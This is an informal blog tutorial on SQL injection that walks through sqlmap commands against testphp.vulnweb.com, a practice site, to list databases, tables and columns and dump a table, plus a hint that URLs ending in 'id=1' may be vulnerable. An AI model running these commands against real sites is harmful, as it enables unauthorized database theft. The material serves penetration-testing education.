Hi Friends...,
OWASP top 10 Vulnerability list we see injection attack like (SQL,Command injection,etc...). Okay..,What's SQL it means Structured Query Language. SQL standard language for storing,manipulating and retrieving data in databases.
Today we see in this article some useful content not Boring lecture.So,how to perform SQLi attack...
note : Which url end with id=1 maybe it's vulnerable to SQL attack.
things you'll need:
1. Pc
2. SQL map
3. this content
target url : http://testphp.vulnweb.com/artists.php?artist=1 ( Anyone use this for penetration testing )
install : sudo apt-get install sqlmap
for help menu type : sqlmap -h
Step 1:
now put a url and discovered database :
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
Step 2 :
connect tables with database :
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --tables -D
information_schema
Step 3 :
then we connect columns and connect files table
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --columns -T
FILES -D information_schema
Step 4 :
now last step and use powerful command dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dump -T
FILES -D information_schema
now we'll finished...! If you have any doubt i'm link to my video tutorial, watch
and earn knowledge.
this video maybe i'm share some useful content..Thanking You
Comments
Post a Comment